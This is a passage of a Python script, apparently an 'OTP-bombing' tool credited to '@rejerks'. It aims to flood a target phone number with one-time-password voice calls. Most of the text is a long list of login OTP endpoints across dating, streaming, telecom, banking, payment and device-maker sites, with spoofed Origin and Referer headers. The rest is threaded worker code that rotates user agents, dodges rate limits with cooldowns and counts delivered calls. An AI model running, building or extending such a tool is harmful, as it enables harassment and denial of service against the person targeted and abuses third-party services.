    {"url": "https://api.flickr.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.flickr.com", "Content-Type": "application/json", "Origin": "https://www.flickr.com", "Referer": "https://www.flickr.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.tinder.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.tinder.com", "Content-Type": "application/json", "Origin": "https://tinder.com", "Referer": "https://tinder.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.bumble.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.bumble.com", "Content-Type": "application/json", "Origin": "https://bumble.com", "Referer": "https://bumble.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.hinge.co/v1/otp/call", "method": "POST", "headers": {"Host": "api.hinge.co", "Content-Type": "application/json", "Origin": "https://hinge.co", "Referer": "https://hinge.co/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.okcupid.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.okcupid.com", "Content-Type": "application/json", "Origin": "https://www.okcupid.com", "Referer": "https://www.okcupid.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.plentyoffish.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.plentyoffish.com", "Content-Type": "application/json", "Origin": "https://www.pof.com", "Referer": "https://www.pof.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.match.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.match.com", "Content-Type": "application/json", "Origin": "https://www.match.com", "Referer": "https://www.match.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.eharmony.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.eharmony.com", "Content-Type": "application/json", "Origin": "https://www.eharmony.com", "Referer": "https://www.eharmony.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.zoosk.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.zoosk.com", "Content-Type": "application/json", "Origin": "https://www.zoosk.com", "Referer": "https://www.zoosk.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.muslima.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.muslima.com", "Content-Type": "application/json", "Origin": "https://www.muslima.com", "Referer": "https://www.muslima.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.mingle2.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.mingle2.com", "Content-Type": "application/json", "Origin": "https://www.mingle2.com", "Referer": "https://www.mingle2.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.ourtime.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.ourtime.com", "Content-Type": "application/json", "Origin": "https://www.ourtime.com", "Referer": "https://www.ourtime.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.blackpeoplemeet.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.blackpeoplemeet.com", "Content-Type": "application/json", "Origin": "https://www.blackpeoplemeet.com", "Referer": "https://www.blackpeoplemeet.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.christianmingle.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.christianmingle.com", "Content-Type": "application/json", "Origin": "https://www.christianmingle.com", "Referer": "https://www.christianmingle.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.jdate.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.jdate.com", "Content-Type": "application/json", "Origin": "https://www.jdate.com", "Referer": "https://www.jdate.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.asiandating.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.asiandating.com", "Content-Type": "application/json", "Origin": "https://www.asiandating.com", "Referer": "https://www.asiandating.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.afrointroductions.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.afrointroductions.com", "Content-Type": "application/json", "Origin": "https://www.afrointroductions.com", "Referer": "https://www.afrointroductions.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.militarycupid.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.militarycupid.com", "Content-Type": "application/json", "Origin": "https://www.militarycupid.com", "Referer": "https://www.militarycupid.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.romancetale.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.romancetale.com", "Content-Type": "application/json", "Origin": "https://www.romancetale.com", "Referer": "https://www.romancetale.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.amour.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.amour.com", "Content-Type": "application/json", "Origin": "https://www.amour.com", "Referer": "https://www.amour.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.friendsdating.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.friendsdating.com", "Content-Type": "application/json", "Origin": "https://www.friendsdating.com", "Referer": "https://www.friendsdating.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.flirt.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.flirt.com", "Content-Type": "application/json", "Origin": "https://www.flirt.com", "Referer": "https://www.flirt.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.hotornot.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.hotornot.com", "Content-Type": "application/json", "Origin": "https://www.hotornot.com", "Referer": "https://www.hotornot.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.ashleymadison.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.ashleymadison.com", "Content-Type": "application/json", "Origin": "https://www.ashleymadison.com", "Referer": "https://www.ashleymadison.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.adultfriendfinder.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.adultfriendfinder.com", "Content-Type": "application/json", "Origin": "https://www.adultfriendfinder.com", "Referer": "https://www.adultfriendfinder.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.badoo.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.badoo.com", "Content-Type": "application/json", "Origin": "https://badoo.com", "Referer": "https://badoo.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.happn.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.happn.com", "Content-Type": "application/json", "Origin": "https://www.happn.com", "Referer": "https://www.happn.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.skout.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.skout.com", "Content-Type": "application/json", "Origin": "https://www.skout.com", "Referer": "https://www.skout.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.omegle.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.omegle.com", "Content-Type": "application/json", "Origin": "https://www.omegle.com", "Referer": "https://www.omegle.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.chatroulette.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.chatroulette.com", "Content-Type": "application/json", "Origin": "https://chatroulette.com", "Referer": "https://chatroulette.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.tinychat.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.tinychat.com", "Content-Type": "application/json", "Origin": "https://tinychat.com", "Referer": "https://tinychat.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.ome.tv/v1/otp/call", "method": "POST", "headers": {"Host": "api.ome.tv", "Content-Type": "application/json", "Origin": "https://www.ome.tv", "Referer": "https://www.ome.tv/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.azarlive.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.azarlive.com", "Content-Type": "application/json", "Origin": "https://www.azarlive.com", "Referer": "https://www.azarlive.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.bigo.tv/v1/otp/call", "method": "POST", "headers": {"Host": "api.bigo.tv", "Content-Type": "application/json", "Origin": "https://www.bigo.tv", "Referer": "https://www.bigo.tv/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.migo.tv/v1/otp/call", "method": "POST", "headers": {"Host": "api.migo.tv", "Content-Type": "application/json", "Origin": "https://www.migo.tv", "Referer": "https://www.migo.tv/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.vimeo.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.vimeo.com", "Content-Type": "application/json", "Origin": "https://vimeo.com", "Referer": "https://vimeo.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.dailymotion.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.dailymotion.com", "Content-Type": "application/json", "Origin": "https://www.dailymotion.com", "Referer": "https://www.dailymotion.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.twitch.tv/v1/otp/call", "method": "POST", "headers": {"Host": "api.twitch.tv", "Content-Type": "application/json", "Origin": "https://www.twitch.tv", "Referer": "https://www.twitch.tv/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.mixer.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.mixer.com", "Content-Type": "application/json", "Origin": "https://mixer.com", "Referer": "https://mixer.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.periscope.tv/v1/otp/call", "method": "POST", "headers": {"Host": "api.periscope.tv", "Content-Type": "application/json", "Origin": "https://www.periscope.tv", "Referer": "https://www.periscope.tv/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.younow.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.younow.com", "Content-Type": "application/json", "Origin": "https://www.younow.com", "Referer": "https://www.younow.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.live.me/v1/otp/call", "method": "POST", "headers": {"Host": "api.live.me", "Content-Type": "application/json", "Origin": "https://www.live.me", "Referer": "https://www.live.me/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.17live.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.17live.com", "Content-Type": "application/json", "Origin": "https://17.live", "Referer": "https://17.live/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.momo.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.momo.com", "Content-Type": "application/json", "Origin": "https://www.momo.com", "Referer": "https://www.momo.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.zalo.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.zalo.com", "Content-Type": "application/json", "Origin": "https://zalo.me", "Referer": "https://zalo.me/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.viber.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.viber.com", "Content-Type": "application/json", "Origin": "https://www.viber.com", "Referer": "https://www.viber.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.imo.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.imo.com", "Content-Type": "application/json", "Origin": "https://imo.im", "Referer": "https://imo.im/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.tango.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.tango.com", "Content-Type": "application/json", "Origin": "https://www.tango.com", "Referer": "https://www.tango.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.skype.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.skype.com", "Content-Type": "application/json", "Origin": "https://www.skype.com", "Referer": "https://www.skype.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.wire.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.wire.com", "Content-Type": "application/json", "Origin": "https://wire.com", "Referer": "https://wire.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.messenger.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.messenger.com", "Content-Type": "application/json", "Origin": "https://www.messenger.com", "Referer": "https://www.messenger.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.hike.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.hike.com", "Content-Type": "application/json", "Origin": "https://www.hike.com", "Referer": "https://www.hike.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.jio.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.jio.com", "Content-Type": "application/json", "Origin": "https://www.jio.com", "Referer": "https://www.jio.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.airtel.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.airtel.com", "Content-Type": "application/json", "Origin": "https://www.airtel.in", "Referer": "https://www.airtel.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.vi.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.vi.com", "Content-Type": "application/json", "Origin": "https://www.vi.in", "Referer": "https://www.vi.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.bsnl.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.bsnl.com", "Content-Type": "application/json", "Origin": "https://www.bsnl.co.in", "Referer": "https://www.bsnl.co.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.tatasky.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.tatasky.com", "Content-Type": "application/json", "Origin": "https://www.tatasky.com", "Referer": "https://www.tatasky.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.dishtv.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.dishtv.com", "Content-Type": "application/json", "Origin": "https://www.dishtv.in", "Referer": "https://www.dishtv.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.sundirect.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.sundirect.com", "Content-Type": "application/json", "Origin": "https://www.sundirect.in", "Referer": "https://www.sundirect.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.videocon.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.videocon.com", "Content-Type": "application/json", "Origin": "https://www.videocon.com", "Referer": "https://www.videocon.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.reliance.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.reliance.com", "Content-Type": "application/json", "Origin": "https://www.reliance.com", "Referer": "https://www.reliance.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.adani.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.adani.com", "Content-Type": "application/json", "Origin": "https://www.adani.com", "Referer": "https://www.adani.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.godrej.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.godrej.com", "Content-Type": "application/json", "Origin": "https://www.godrej.com", "Referer": "https://www.godrej.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.hinduja.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.hinduja.com", "Content-Type": "application/json", "Origin": "https://www.hinduja.com", "Referer": "https://www.hinduja.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.icicibank.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.icicibank.com", "Content-Type": "application/json", "Origin": "https://www.icicibank.com", "Referer": "https://www.icicibank.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.hdfcbank.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.hdfcbank.com", "Content-Type": "application/json", "Origin": "https://www.hdfcbank.com", "Referer": "https://www.hdfcbank.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.sbicard.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.sbicard.com", "Content-Type": "application/json", "Origin": "https://www.sbicard.com", "Referer": "https://www.sbicard.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.axisbank.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.axisbank.com", "Content-Type": "application/json", "Origin": "https://www.axisbank.com", "Referer": "https://www.axisbank.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.kotakbank.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.kotakbank.com", "Content-Type": "application/json", "Origin": "https://www.kotak.com", "Referer": "https://www.kotak.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.yesbank.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.yesbank.com", "Content-Type": "application/json", "Origin": "https://www.yesbank.in", "Referer": "https://www.yesbank.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.idfcbank.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.idfcbank.com", "Content-Type": "application/json", "Origin": "https://www.idfcbank.com", "Referer": "https://www.idfcbank.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.rblbank.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.rblbank.com", "Content-Type": "application/json", "Origin": "https://www.rblbank.com", "Referer": "https://www.rblbank.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.indusind.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.indusind.com", "Content-Type": "application/json", "Origin": "https://www.indusind.com", "Referer": "https://www.indusind.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.federalbank.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.federalbank.com", "Content-Type": "application/json", "Origin": "https://www.federalbank.co.in", "Referer": "https://www.federalbank.co.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.citibank.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.citibank.com", "Content-Type": "application/json", "Origin": "https://www.citibank.com", "Referer": "https://www.citibank.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.hsbc.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.hsbc.com", "Content-Type": "application/json", "Origin": "https://www.hsbc.com", "Referer": "https://www.hsbc.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.standardchartered.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.standardchartered.com", "Content-Type": "application/json", "Origin": "https://www.sc.com", "Referer": "https://www.sc.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.dbs.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.dbs.com", "Content-Type": "application/json", "Origin": "https://www.dbs.com", "Referer": "https://www.dbs.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.ubank.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.ubank.com", "Content-Type": "application/json", "Origin": "https://www.ubank.com", "Referer": "https://www.ubank.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.paypal.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.paypal.com", "Content-Type": "application/json", "Origin": "https://www.paypal.com", "Referer": "https://www.paypal.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.stripe.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.stripe.com", "Content-Type": "application/json", "Origin": "https://stripe.com", "Referer": "https://stripe.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.razorpay.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.razorpay.com", "Content-Type": "application/json", "Origin": "https://razorpay.com", "Referer": "https://razorpay.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.pineperks.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.pineperks.com", "Content-Type": "application/json", "Origin": "https://www.pineperks.com", "Referer": "https://www.pineperks.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.freecharge.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.freecharge.com", "Content-Type": "application/json", "Origin": "https://www.freecharge.com", "Referer": "https://www.freecharge.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.mobikwik.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.mobikwik.com", "Content-Type": "application/json", "Origin": "https://www.mobikwik.com", "Referer": "https://www.mobikwik.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.airtelpay.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.airtelpay.com", "Content-Type": "application/json", "Origin": "https://www.airtelpay.com", "Referer": "https://www.airtelpay.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.jiopay.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.jiopay.com", "Content-Type": "application/json", "Origin": "https://www.jiopay.com", "Referer": "https://www.jiopay.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.amazonpay.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.amazonpay.com", "Content-Type": "application/json", "Origin": "https://www.amazonpay.com", "Referer": "https://www.amazonpay.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.googlepay.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.googlepay.com", "Content-Type": "application/json", "Origin": "https://pay.google.com", "Referer": "https://pay.google.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.apple.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.apple.com", "Content-Type": "application/json", "Origin": "https://appleid.apple.com", "Referer": "https://appleid.apple.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.samsung.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.samsung.com", "Content-Type": "application/json", "Origin": "https://account.samsung.com", "Referer": "https://account.samsung.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.xiaomi.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.xiaomi.com", "Content-Type": "application/json", "Origin": "https://account.xiaomi.com", "Referer": "https://account.xiaomi.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.oppo.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.oppo.com", "Content-Type": "application/json", "Origin": "https://id.oppo.com", "Referer": "https://id.oppo.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.vivo.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.vivo.com", "Content-Type": "application/json", "Origin": "https://id.vivo.com", "Referer": "https://id.vivo.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.oneplus.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.oneplus.com", "Content-Type": "application/json", "Origin": "https://account.oneplus.com", "Referer": "https://account.oneplus.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.realme.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.realme.com", "Content-Type": "application/json", "Origin": "https://account.realme.com", "Referer": "https://account.realme.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.nokia.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.nokia.com", "Content-Type": "application/json", "Origin": "https://account.nokia.com", "Referer": "https://account.nokia.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.lenovo.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.lenovo.com", "Content-Type": "application/json", "Origin": "https://account.lenovo.com", "Referer": "https://account.lenovo.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.hp.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.hp.com", "Content-Type": "application/json", "Origin": "https://account.hp.com", "Referer": "https://account.hp.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.dell.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.dell.com", "Content-Type": "application/json", "Origin": "https://account.dell.com", "Referer": "https://account.dell.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.asus.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.asus.com", "Content-Type": "application/json", "Origin": "https://account.asus.com", "Referer": "https://account.asus.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.acer.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.acer.com", "Content-Type": "application/json", "Origin": "https://account.acer.com", "Referer": "https://account.acer.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.msi.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.msi.com", "Content-Type": "application/json", "Origin": "https://account.msi.com", "Referer": "https://account.msi.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
]

endpoints.extend(extra_endpoints)
endpoints.extend(call_endpoints)

def substitute(data, target):
    if isinstance(data, dict):
        return {k: substitute(v, target) for k, v in data.items()}
    elif isinstance(data, list):
        return [substitute(item, target) for item in data]
    elif isinstance(data, str):
        return data.replace('REPLACE_WITH_TARGET', target)
    else:
        return data

def build_headers(base_headers):
    h = base_headers.copy() if base_headers else {}
    h['User-Agent'] = random.choice(user_agents)
    return h

def worker(target, stop_event):
    global sent, failed, rate_limited
    session = requests.Session()
    session.mount('http://', HTTPAdapter(pool_connections=20, pool_maxsize=20))
    session.mount('https://', HTTPAdapter(pool_connections=20, pool_maxsize=20))
    cooldown = {}

    while not stop_event.is_set():
        ep = None
        attempts = 0
        while ep is None and attempts < 50:
            candidate = random.choice(endpoints)
            url = candidate['url']
            if url in cooldown and time.time() < cooldown[url]:
                attempts += 1
                time.sleep(0.1)
                continue
            ep = candidate
            break
        if ep is None:
            time.sleep(2)
            continue

        url = ep['url']
        method = ep['method']
        headers = build_headers(ep.get('headers'))
        json_payload = substitute(ep.get('json'), target) if 'json' in ep else None
        data_payload = substitute(ep.get('data'), target) if 'data' in ep else None

        try:
            if method == 'POST':
                resp = session.post(url, headers=headers, json=json_payload, data=data_payload, timeout=10)
            elif method == 'PUT':
                resp = session.put(url, headers=headers, json=json_payload, timeout=10)
            elif method == 'GET':
                resp = session.get(url, headers=headers, timeout=10)
            else:
                continue

            with lock:
                if resp.status_code == 429:
                    rate_limited += 1
                    cooldown[url] = time.time() + 120
                elif 200 <= resp.status_code < 300:
                    sent += 1
                else:
                    failed += 1
                    if resp.status_code in (400, 401, 403, 404, 405, 410, 422):
                        cooldown[url] = time.time() + 60

            if resp.status_code >= 400:
                time.sleep(random.uniform(1.0, 3.0))
            else:
                time.sleep(random.uniform(0.5, 1.5))

        except Exception:
            with lock:
                failed += 1
            cooldown[url] = time.time() + 60
            time.sleep(1)

def stats_display():
    global running, target, sent, failed, rate_limited
    while running:
        os.system('cls' if os.name == 'nt' else 'clear')
        console.print(f"[bold red]Target: {target}[/bold red]", justify="center")
        console.print("[bold yellow]    OTP-BOMBING -Stats[/bold yellow]", justify="center")
        console.print("[bold white]——————————[/bold white]", justify="center")
        with lock:
            console.print(f"[bold green]• Sent   {sent}[/bold green]", justify="center")
            console.print(f"[bold red]• Failed {failed}[/bold red]", justify="center")
            console.print(f"[bold yellow]• Error  {rate_limited}[/bold yellow]", justify="center")
        console.print("[bold white]——————————[/bold white]", justify="center")
        console.print("[bold white]BY @rejerks | WLZBI[/bold white]", justify="center")
